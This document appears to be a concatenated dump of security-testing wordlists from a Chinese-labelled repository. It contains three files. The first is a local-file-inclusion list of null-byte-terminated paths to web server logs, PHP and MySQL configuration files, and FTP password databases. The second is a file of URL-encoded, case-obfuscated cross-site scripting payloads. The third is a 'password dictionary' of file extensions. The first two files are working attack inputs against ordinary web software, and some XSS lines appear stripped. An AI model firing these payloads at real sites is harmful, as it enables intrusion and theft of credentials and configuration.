58 | /apache2/logs/error.log%00
59 | /apache2/logs/access.log%00
60 | /apache2/logs/error.log%00
61 | /apache2/logs/access.log%00
62 | /apache2/logs/error.log%00
63 | /apache2/logs/access.log%00
64 | /logs/error.log%00
65 | /logs/access.log%00
66 | /logs/error.log%00
67 | /logs/access.log%00
68 | /logs/error.log%00
69 | /logs/access.log%00
70 | /logs/error.log%00
71 | /logs/access.log%00
72 | /logs/error.log%00
73 | /logs/access.log%00
74 | /etc/httpd/logs/acces_log%00
75 | /etc/httpd/logs/acces.log%00
76 | /etc/httpd/logs/error_log%00
77 | /etc/httpd/logs/error.log%00
78 | /usr/local/apache/logs/access_log%00
79 | /usr/local/apache/logs/access.log%00
80 | /usr/local/apache/logs/error_log%00
81 | /usr/local/apache/logs/error.log%00
82 | /usr/local/apache2/logs/access_log%00
83 | /usr/local/apache2/logs/access.log%00
84 | /usr/local/apache2/logs/error_log%00
85 | /usr/local/apache2/logs/error.log%00
86 | /var/www/logs/access_log%00
87 | /var/www/logs/access.log%00
88 | /var/www/logs/error_log%00
89 | /var/www/logs/error.log%00
90 | /var/log/httpd/access_log%00
91 | /var/log/httpd/access.log%00
92 | /var/log/httpd/error_log%00
93 | /var/log/httpd/error.log%00
94 | /var/log/apache/access_log%00
95 | /var/log/apache/access.log%00
96 | /var/log/apache/error_log%00
97 | /var/log/apache/error.log%00
98 | /var/log/apache2/access_log%00
99 | /var/log/apache2/access.log%00
100 | /var/log/apache2/error_log%00
101 | /var/log/apache2/error.log%00
102 | /var/log/access_log%00
103 | /var/log/access.log%00
104 | /var/log/error_log%00
105 | /var/log/error.log%00
106 | /opt/lampp/logs/access_log%00
107 | /opt/lampp/logs/error_log%00
108 | /opt/xampp/logs/access_log%00
109 | /opt/xampp/logs/error_log%00
110 | /opt/lampp/logs/access.log%00
111 | /opt/lampp/logs/error.log%00
112 | /opt/xampp/logs/access.log%00
113 | /opt/xampp/logs/error.log%00
114 | /Program Files\Apache Group\Apache\logs\access.log%00
115 | /Program Files\Apache Group\Apache\logs\error.log%00
116 | /apache/logs/error.log%00
117 | /apache/logs/access.log%00
118 | /apache/logs/error.log%00
119 | /apache/logs/access.log%00
120 | /apache/logs/error.log%00
121 | /apache/logs/access.log%00
122 | /apache/logs/error.log%00
123 | /apache/logs/access.log%00
124 | /apache/logs/error.log%00
125 | /apache/logs/access.log%00
126 | /apache/logs/error.log%00
127 | /apache/logs/access.log%00
128 | /logs/error.log%00
129 | /logs/access.log%00
130 | /logs/error.log%00
131 | /logs/access.log%00
132 | /logs/error.log%00
133 | /logs/access.log%00
134 | /logs/error.log%00
135 | /logs/access.log%00
136 | /logs/error.log%00
137 | /logs/access.log%00
138 | /logs/error.log%00
139 | /logs/access.log%00
140 | /etc/httpd/logs/acces_log%00
141 | /etc/httpd/logs/acces.log%00
142 | /etc/httpd/logs/error_log%00
143 | /etc/httpd/logs/error.log%00
144 | /var/www/logs/access_log%00
145 | /var/www/logs/access.log%00
146 | /usr/local/apache/logs/access_log%00
147 | /usr/local/apache/logs/access.log%00
148 | /var/log/apache/access_log%00
149 | /var/log/apache/access.log%00
150 | /var/log/access_log%00
151 | /var/www/logs/error_log%00
152 | /var/www/logs/error.log%00
153 | /usr/local/apache/logs/error_log%00
154 | /usr/local/apache/logs/error.log%00
155 | /var/log/apache/error_log%00
156 | /var/log/apache/error.log%00
157 | /var/log/access_log%00
158 | /var/log/error_log%00
159 | /usr/local/apache/conf/httpd.conf%00
160 | /usr/local/apache2/conf/httpd.conf%00
161 | /etc/httpd/conf/httpd.conf%00
162 | /etc/apache/conf/httpd.conf%00
163 | /usr/local/etc/apache/conf/httpd.conf%00
164 | /etc/apache2/httpd.conf%00
165 | /usr/local/apache/conf/httpd.conf%00
166 | /usr/local/apache2/conf/httpd.conf%00
167 | /usr/local/apache/httpd.conf%00
168 | /usr/local/apache2/httpd.conf%00
169 | /usr/local/httpd/conf/httpd.conf%00
170 | /usr/local/etc/apache/conf/httpd.conf%00
171 | /usr/local/etc/apache2/conf/httpd.conf%00
172 | /usr/local/etc/httpd/conf/httpd.conf%00
173 | /usr/apache2/conf/httpd.conf%00
174 | /usr/apache/conf/httpd.conf%00
175 | /usr/local/apps/apache2/conf/httpd.conf%00
176 | /usr/local/apps/apache/conf/httpd.conf%00
177 | /etc/apache/conf/httpd.conf%00
178 | /etc/apache2/conf/httpd.conf%00
179 | /etc/httpd/conf/httpd.conf%00
180 | /etc/http/conf/httpd.conf%00
181 | /etc/apache2/httpd.conf%00
182 | /etc/httpd/httpd.conf%00
183 | /etc/http/httpd.conf%00
184 | /etc/httpd.conf%00
185 | /opt/apache/conf/httpd.conf%00
186 | /opt/apache2/conf/httpd.conf%00
187 | /var/www/conf/httpd.conf%00
188 | /private/etc/httpd/httpd.conf%00
189 | /private/etc/httpd/httpd.conf.default%00
190 | /Volumes/webBackup/opt/apache2/conf/httpd.conf%00
191 | /Volumes/webBackup/private/etc/httpd/httpd.conf%00
192 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default%00
193 | /Program Files\Apache Group\Apache\conf\httpd.conf%00
194 | /Program Files\Apache Group\Apache2\conf\httpd.conf%00
195 | /Program Files\xampp\apache\conf\httpd.conf%00
196 | /usr/local/php/httpd.conf.php%00
197 | /usr/local/php4/httpd.conf.php%00
198 | /usr/local/php5/httpd.conf.php%00
199 | /usr/local/php/httpd.conf%00
200 | /usr/local/php4/httpd.conf%00
201 | /usr/local/php5/httpd.conf%00
202 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf%00
203 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf%00
204 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf%00
205 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php%00
206 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php%00
207 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php%00
208 | /usr/local/etc/apache/vhosts.conf%00
209 | /etc/php.ini%00
210 | /bin/php.ini%00
211 | /etc/httpd/php.ini%00
212 | /usr/lib/php.ini%00
213 | /usr/lib/php/php.ini%00
214 | /usr/local/etc/php.ini%00
215 | /usr/local/lib/php.ini%00
216 | /usr/local/php/lib/php.ini%00
217 | /usr/local/php4/lib/php.ini%00
218 | /usr/local/php5/lib/php.ini%00
219 | /usr/local/apache/conf/php.ini%00
220 | /etc/php4.4/fcgi/php.ini%00
221 | /etc/php4/apache/php.ini%00
222 | /etc/php4/apache2/php.ini%00
223 | /etc/php5/apache/php.ini%00
224 | /etc/php5/apache2/php.ini%00
225 | /etc/php/php.ini%00
226 | /etc/php/php4/php.ini%00
227 | /etc/php/apache/php.ini%00
228 | /etc/php/apache2/php.ini%00
229 | /web/conf/php.ini%00
230 | /usr/local/Zend/etc/php.ini%00
231 | /opt/xampp/etc/php.ini%00
232 | /var/local/www/conf/php.ini%00
233 | /etc/php/cgi/php.ini%00
234 | /etc/php4/cgi/php.ini%00
235 | /etc/php5/cgi/php.ini%00
236 | /php5\php.ini%00
237 | /php4\php.ini%00
238 | /php\php.ini%00
239 | /PHP\php.ini%00
240 | /WINDOWS\php.ini%00
241 | /WINNT\php.ini%00
242 | /apache\php\php.ini%00
243 | /xampp\apache\bin\php.ini%00
244 | /NetServer\bin\stable\apache\php.ini%00
245 | /home2\bin\stable\apache\php.ini%00
246 | /home\bin\stable\apache\php.ini%00
247 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini%00
248 | /usr/local/cpanel/logs%00
249 | /usr/local/cpanel/logs/stats_log%00
250 | /usr/local/cpanel/logs/access_log%00
251 | /usr/local/cpanel/logs/error_log%00
252 | /usr/local/cpanel/logs/license_log%00
253 | /usr/local/cpanel/logs/login_log%00
254 | /usr/local/cpanel/logs/stats_log%00
255 | /var/cpanel/cpanel.config%00
256 | /var/log/mysql/mysql-bin.log%00
257 | /var/log/mysql.log%00
258 | /var/log/mysqlderror.log%00
259 | /var/log/mysql/mysql.log%00
260 | /var/log/mysql/mysql-slow.log%00
261 | /var/mysql.log%00
262 | /var/lib/mysql/my.cnf%00
263 | /etc/mysql/my.cnf%00
264 | /etc/my.cnf%00
265 | /etc/logrotate.d/proftpd%00
266 | /www/logs/proftpd.system.log%00
267 | /var/log/proftpd%00
268 | /etc/proftp.conf%00
269 | /etc/protpd/proftpd.conf%00
270 | /etc/vhcs2/proftpd/proftpd.conf%00
271 | /etc/proftpd/modules.conf%00
272 | /var/log/vsftpd.log%00
273 | /etc/vsftpd.chroot_list%00
274 | /etc/logrotate.d/vsftpd.log%00
275 | /etc/vsftpd/vsftpd.conf%00
276 | /etc/vsftpd.conf%00
277 | /etc/chrootUsers%00
278 | /var/log/xferlog%00
279 | /var/adm/log/xferlog%00
280 | /etc/wu-ftpd/ftpaccess%00
281 | /etc/wu-ftpd/ftphosts%00
282 | /etc/wu-ftpd/ftpusers%00
283 | /usr/sbin/pure-config.pl%00
284 | /usr/etc/pure-ftpd.conf%00
285 | /etc/pure-ftpd/pure-ftpd.conf%00
286 | /usr/local/etc/pure-ftpd.conf%00
287 | /usr/local/etc/pureftpd.pdb%00
288 | /usr/local/pureftpd/etc/pureftpd.pdb%00
289 | /usr/local/pureftpd/sbin/pure-config.pl%00
290 | /usr/local/pureftpd/etc/pure-ftpd.conf%00
291 | /etc/pure-ftpd.conf%00
292 | /etc/pure-ftpd/pure-ftpd.pdb%00
293 | /etc/pureftpd.pdb%00
294 | /etc/pureftpd.passwd%00
295 | /etc/pure-ftpd/pureftpd.pdb%00
296 | /usr/ports/ftp/pure-ftpd/%00
297 | /usr/ports/net/pure-ftpd/%00
298 | /usr/pkgsrc/net/pureftpd/%00
299 | /usr/ports/contrib/pure-ftpd/%00
300 | /var/log/pure-ftpd/pure-ftpd.log%00
301 | /logs/pure-ftpd.log%00
302 | /var/log/pureftpd.log%00
303 | /var/log/ftp-proxy/ftp-proxy.log%00
304 | /var/log/ftp-proxy%00
305 | /var/log/ftplog%00
306 | /etc/logrotate.d/ftp%00
307 | /etc/ftpchroot%00
308 | /etc/ftphosts%00
309 | /var/log/exim_mainlog%00
310 | /var/log/exim/mainlog%00
311 | /var/log/maillog%00
312 | /var/log/exim_paniclog%00
313 | /var/log/exim/paniclog%00
314 | /var/log/exim/rejectlog%00
315 | /var/log/exim_rejectlog%00
--------------------------------------------------------------------------------
/XSS测试/XSSalertTest.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 | ">
4 | ">
5 | =><>
6 | =><>
7 | =">
8 | =">
9 | ='>
10 | ='>
11 | ="><
12 | ="><
13 | ='><
14 | ='><
15 |
16 |
17 | ">
18 | ">
19 | =><>
20 | =><>
21 | =">
22 | =">
23 | ='>
24 | ='>
25 | ="><
26 | ="><
27 | ='><
28 | ='><
29 | "%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
30 | "%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
31 | =%3e%3c%3e%3cscript>alert('XSS')%3c%2fscript%3e
32 | =%3e%3c%3e%3cScRiPt>AlErT('XSS')%3c%2fScRiPt%3e
33 | ="%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
34 | ="%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
35 | ='%3e%3cscript%3ealert('XSS')%3c%2fscript%3e
36 | ='%3e%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
37 | ="%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e
38 | ="%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
39 | ='%3e%3c%3cscript%3ealert('XSS')%3c%2fscript%3e
40 | ='%3e%3c%3cScRiPt%3eAlErT('XSS')%3c%2fScRiPt%3e
41 | \\>
42 | \\>
43 | =><>
44 | =><>
45 | =\\>
46 | =\\>
47 | =\>
48 | =\>
49 | =\\><
50 | =\\><
51 | =\><
52 | =\><
53 | "%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
54 | "%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
55 | =%3e%3c%3e%3cscript>alert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
56 | =%3e%3c%3e%3cScRiPt>AlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
57 | ="%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
58 | ="%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
59 | ='%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
60 | ='%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
61 | ="%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
62 | ="%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
63 | ='%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
64 | ='%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
65 | \\>
66 | \\>
67 | =><>
68 | =><>
69 | =\\>
70 | =\\>
71 | =\>
72 | =\>
73 | =\\><
74 | =\\><
75 | =\><
76 | =\><
77 | %5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
78 | %5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
79 | =%3e%3c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
80 | =%3e%3c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
81 | =%5c%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
82 | =%5c%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
83 | =%5c%3e%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
84 | =%5c%3e%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
85 | =%5c%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
86 | =%5c%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
87 | =%5c%3e%3c%3cscript%3ealert(%5cXSS%5c)%3c%2fscript%3e
88 | =%5c%3e%3c%3cScRiPt%3eAlErT(%5cXSS%5c)%3c%2fScRiPt%3e
89 | %5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
90 | %5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
91 | =%3e%3c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
92 | =%3e%3c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
93 | =%5c%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
94 | =%5c%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
95 | =%5c%3e%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
96 | =%5c%3e%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
97 | =%5c%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
98 | =%5c%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
99 | =%5c%3e%3c%3cscript%3ealert(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
100 | =%5c%3e%3c%3cScRiPt%3eAlErT(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
101 |
102 |
103 | ">
104 | ">
105 | =><>
106 | =><>
107 | =">
108 | =">
109 | ='>
110 | ='>
111 | ="><
112 | ="><
113 | ='><
114 | ='><
115 |
116 |
117 | ">
118 | ">
119 | =><>
120 | =><>
121 | =">
122 | =">
123 | ='>
124 | ='>
125 | ="><
126 | ="><
127 | ='><
128 | ='><
129 | "%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
130 | "%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
131 | =%3e%3c%3e%3cscript>prompt('XSS')%3c%2fscript%3e
132 | =%3e%3c%3e%3cScRiPt>PrOmPt('XSS')%3c%2fScRiPt%3e
133 | ="%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
134 | ="%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
135 | ='%3e%3cscript%3eprompt('XSS')%3c%2fscript%3e
136 | ='%3e%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
137 | ="%3e%3c%3cscript%3eprompt('XSS')%3c%2fscript%3e
138 | ="%3e%3c%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
139 | ='%3e%3c%3cscript%3eprompt('XSS')%3c%2fscript%3e
140 | ='%3e%3c%3cScRiPt%3ePrOmPt('XSS')%3c%2fScRiPt%3e
141 | \\>
142 | \\>
143 | =><>
144 | =><>
145 | =\\>
146 | =\\>
147 | =\>
148 | =\>
149 | =\\><
150 | =\\><
151 | =\><
152 | =\><
153 | "%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
154 | "%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
155 | =%3e%3c%3e%3cscript>prompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
156 | =%3e%3c%3e%3cScRiPt>PrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
157 | ="%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
158 | ="%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
159 | ='%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
160 | ='%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
161 | ="%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
162 | ="%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
163 | ='%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
164 | ='%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
165 | \\>
166 | \\>
167 | =><>
168 | =><>
169 | =\\>
170 | =\\>
171 | =\>
172 | =\>
173 | =\\><
174 | =\\><
175 | =\><
176 | =\><
177 | %5c%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
178 | %5c%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
179 | =%3e%3c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
180 | =%3e%3c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
181 | =%5c%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
182 | =%5c%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
183 | =%5c%3e%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
184 | =%5c%3e%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
185 | =%5c%5c%3e%3c%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
186 | =%5c%5c%3e%3c%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
187 | =%5c%3e%3c%3cscript%3eprompt(%5cXSS%5c)%3c%2fscript%3e
188 | =%5c%3e%3c%3cScRiPt%3ePrOmPt(%5cXSS%5c)%3c%2fScRiPt%3e
189 | %5c%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
190 | %5c%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
191 | =%3e%3c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
192 | =%3e%3c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
193 | =%5c%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
194 | =%5c%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
195 | =%5c%3e%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
196 | =%5c%3e%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
197 | =%5c%5c%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
198 | =%5c%5c%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
199 | =%5c%3e%3c%3cscript%3eprompt(String.fromCharCode(88, 83, 83)%3c%2fscript%3e
200 | =%5c%3e%3c%3cScRiPt%3ePrOmPt(String.fromCharCode(88, 83, 83)%3c%2fScRiPt%3e
--------------------------------------------------------------------------------
/Password dictionary/1000多个扩展名.dict:
--------------------------------------------------------------------------------
1 | $er
2 | ^^^
3 | {pb
4 | ~hm
5 | 0
6 | 000
7 | 123
8 | 1pe
9 | 1ph
10 | 3dr
11 | 3dt
12 | 3me
13 | 3pe
14 | 4dl
15 | 4dv
16 | 7z
17 | 8xk
18 | a00
19 | a01
20 | a02
21 | a3l
22 | a3m
23 | a3w
24 | a4l
25 | a4m
26 | a4w
27 | a5l
28 | a5w
29 | a65
30 | aao
31 | ab
32 | ab1
33 | ab2
34 | ab3
35 | abcd
36 | abi
37 | abp
38 | aby
39 | aca
40 | acc
41 | accdb
42 | ace
43 | acf
44 | acg
45 | ade
46 | adp
47 | adt
48 | adx
49 | aft
50 | agd
51 | aifb
52 | ain
53 | alc
54 | ald
55 | ali
56 | alz
57 | amb
58 | amsorm
59 | an1
60 | anme
61 | apr
62 | apz
63 | ar
64 | arc
65 | arh
66 | ari
67 | arj
68 | ark
69 | ask
70 | asm
71 | ast
72 | at5
73 | att
74 | aw
75 | awg
76 | axx
77 | azw
78 | b64
79 | ba
80 | bafl
81 | bci
82 | bcm
83 | bdf
84 | bdic
85 | bfx
86 | bgl
87 | bgt
88 | bh
89 | bin
90 | bjo
91 | bk
92 | bkk
93 | blb
94 | bld
95 | blg
96 | bok
97 | boo
98 | box
99 | brd
100 | brw
101 | btf
102 | btif
103 | btm
104 | btr
105 | bz
106 | bz2
107 | bzip
108 | bzip2
109 | c00
110 | c01
111 | c02
112 | cap
113 | car
114 | cat
115 | cb7
116 | cbg
117 | cbr
118 | cbt
119 | cbz
120 | cch
121 | ccr
122 | cct
123 | cdb
124 | cdd
125 | cdf
126 | cdp
127 | cdr
128 | cdx
129 | cel
130 | celtx
131 | chg
132 | chk
133 | chn
134 | ckd
135 | ckt
136 | cl2
137 | cl4
138 | clb
139 | clix
140 | clm
141 | clp
142 | cmbl
143 | cna
144 | contact
145 | cp9
146 | cpgz
147 | cpi
148 | cpmz
149 | cpt
150 | crd
151 | crtx
152 | csa
153 | csv
154 | ctf
155 | ctt
156 | cursorfx
157 | curxptheme
158 | cvd
159 | cvn
160 | cwk
161 | cws
162 | cwz
163 | cxt
164 | cyo
165 | cys
166 | daf
167 | dal
168 | dam
169 | dar
170 | das
171 | dat
172 | data
173 | db
174 | db2
175 | db3
176 | dbc
177 | dbd
178 | dbf
179 | dbx
180 | dcf
181 | dcl
182 | dcm
183 | dcmd
184 | dd
185 | ddc
186 | ddcx
187 | ddt
188 | deb
189 | dem
190 | des
191 | dex
192 | dfm
193 | dfproj
194 | dft
195 | dgb
196 | dgc
197 | dif
198 | dii
199 | dist
200 | dlg
201 | dm2
202 | dmo
203 | dmsk
204 | dnc
205 | dockzip
206 | dp1
207 | dpn
208 | dpx
209 | drl
210 | dsb
211 | dsd
212 | dsk
213 | dsy
214 | dsz
215 | dt0
216 | dt1
217 | dt2
218 | dta
219 | dtr
220 | dvdproj
221 | dvo
222 | dwi
223 | e00
224 | eap
225 | ebuild
226 | ec0
227 | eco
228 | ecs
229 | ecx
230 | edb
231 | edf
232 | eep
233 | efw
234 | efx
235 | egp
236 | emb
237 | emd
238 | emlxpart
239 | enc
240 | enw
241 | epi
242 | epp
243 | epub
244 | epw
245 | er1
246 | esp
247 | ess
248 | est
249 | esx
250 | et
251 | eta
252 | etd
253 | etl
254 | ev
255 | ev3
256 | evt
257 | evy
258 | exif
259 | exp
260 | exx
261 | f
262 | fa
263 | fasta
264 | fbl
265 | fcd
266 | fcs
267 | fdb
268 | fdp
269 | ffd
270 | ffwp
271 | fhc
272 | fid
273 | fil
274 | flame
275 | fll
276 | flo
277 | flp
278 | flt
279 | fm
280 | fm5
281 | fmp
282 | fo
283 | fob
284 | fol
285 | fop
286 | fox
287 | fp
288 | fp3
289 | fp4
290 | fp5
291 | fp7
292 | frl
293 | frm
294 | fro
295 | frx
296 | fsb
297 | fsc
298 | ftm
299 | ftw
300 | gan
301 | gbr
302 | gc
303 | gca
304 | gcx
305 | gdb
306 | ged
307 | gedcom
308 | gen
309 | ggb
310 | gml
311 | gms
312 | gno
313 | gnp
314 | gp3
315 | gpi
316 | gps
317 | gpx
318 | gra
319 | grade
320 | grf
321 | grib
322 | grk
323 | grr
324 | grv
325 | gs
326 | gst
327 | gtp
328 | gwk
329 | gxl
330 | gz
331 | gzi
332 | gzip
333 | ha
334 | hbc
335 | hbc2
336 | hbe
337 | hcc
338 | hce
339 | hci
340 | hcp
341 | hcr
342 | hcu
343 | hda
344 | hdb
345 | hdf
346 | hdi
347 | hdl
348 | hif
349 | hki
350 | hki1
351 | hki2
352 | hki3
353 | hl
354 | hml
355 | hmt
356 | hpk
357 | hs2
358 | hsk
359 | hst
360 | htg
361 | huh
362 | hyp
363 | hyv
364 | i5z
365 | ib
366 | ice
367 | ics
368 | id2
369 | idx
370 | igc
371 | ihx
372 | ii
373 | iif
374 | img
375 | imt
376 | ink
377 | inp
378 | ins
379 | ip
380 | ipg
381 | ipk
382 | irock
383 | irr
384 | irx
385 | isf
386 | ish
387 | itdb
388 | itl
389 | itm
390 | itn
391 | itw
392 | itx
393 | ivt
394 | iw
395 | ixb
396 | j
397 | jar.pack
398 | jasper
399 | jdb
400 | jef
401 | jgz
402 | jic
403 | jmp
404 | jnt
405 | job
406 | joboptions
407 | joined
408 | jph
409 | jrprint
410 | jrxml
411 | jude
412 | kap
413 | kdb
414 | kgb
415 | kid
416 | kismac
417 | kmz
418 | kpf
419 | kpp
420 | kpr
421 | kpx
422 | kpz
423 | l
424 | l6t
425 | laccdb
426 | lbl
427 | lbr
428 | lbx
429 | lcd
430 | lcf
431 | lcm
432 | ldif
433 | lemon
434 | lex
435 | lgc
436 | lgf
437 | lgh
438 | lgi
439 | lgl
440 | lha
441 | lib
442 | lif
443 | livereg
444 | liveupdate
445 | lix
446 | llb
447 | lms
448 | lmx
449 | lnt
450 | lnx
451 | loc
452 | lp7
453 | lqr
454 | lrf
455 | lrs
456 | lrx
457 | lsf
458 | lsl
459 | lsp
460 | lsr
461 | lst
462 | lsu
463 | lvm
464 | lw4
465 | ly
466 | lz
467 | lzh
468 | lzm
469 | lzma
470 | lzo
471 | lzx
472 | m
473 | mag
474 | mai
475 | map
476 | masseffectprofile
477 | mat
478 | mbb
479 | mbf
480 | mbg
481 | mbl
482 | mbp
483 | mbx
484 | mc1
485 | mc9
486 | mcd
487 | md
488 | mdb
489 | mdc
490 | mdf
491 | mdl
492 | mdm
493 | mdn
494 | mdt
495 | mdx
496 | mdz
497 | mem
498 | menc
499 | met
500 | mex
501 | mfo
502 | mfp
503 | mgc
504 | mint
505 | mls
506 | mm
507 | mmap
508 | mmc
509 | mmf
510 | mmp
511 | mnc
512 | mng
513 | mnk
514 | mno
515 | mny
516 | mobi
517 | moho
518 | mosaic
519 | mou
520 | mox
521 | mpd
522 | mpj
523 | mpkg
524 | mpp
525 | mpt
526 | mpx
527 | mpz
528 | mq4
529 | ms10
530 | mth
531 | mtw
532 | mud
533 | muf
534 | mw
535 | mwf
536 | mws
537 | mwx
538 | mxd
539 | myd
540 | myi
541 | mzp
542 | nb
543 | nc
544 | ndf
545 | ndk
546 | ndx
547 | net
548 | neta
549 | nfo
550 | nitf
551 | nmind
552 | not
553 | notebook
554 | np
555 | npl
556 | npt
557 | nrl
558 | ns2
559 | ns3
560 | ns4
561 | nsf
562 | ntx
563 | numbers
564 | nvl
565 | nyf
566 | oab
567 | oar
568 | obj
569 | odb
570 | odf
571 | odp
572 | ods
573 | odx
574 | oeaccount
575 | ofc
576 | ofm
577 | oft
578 | ofx
579 | omcs
580 | omp
581 | ond
582 | one
583 | oo3
584 | opf
585 | opx
586 | or2
587 | or3
588 | or4
589 | or5
590 | or6
591 | org
592 | orx
593 | otf
594 | otl
595 | otln
596 | ots
597 | out
598 | ov2
599 | ova
600 | ovf
601 | p7m
602 | p96
603 | p97
604 | pab
605 | pack.gz
606 | package
607 | pae
608 | paf
609 | pak
610 | pan
611 | paq6
612 | paq7
613 | paq8
614 | par
615 | par2
616 | pbd
617 | pbi
618 | pc
619 | pcap
620 | pcb
621 | pcr
622 | pcv
623 | pd4
624 | pd5
625 | pdas
626 | pdb
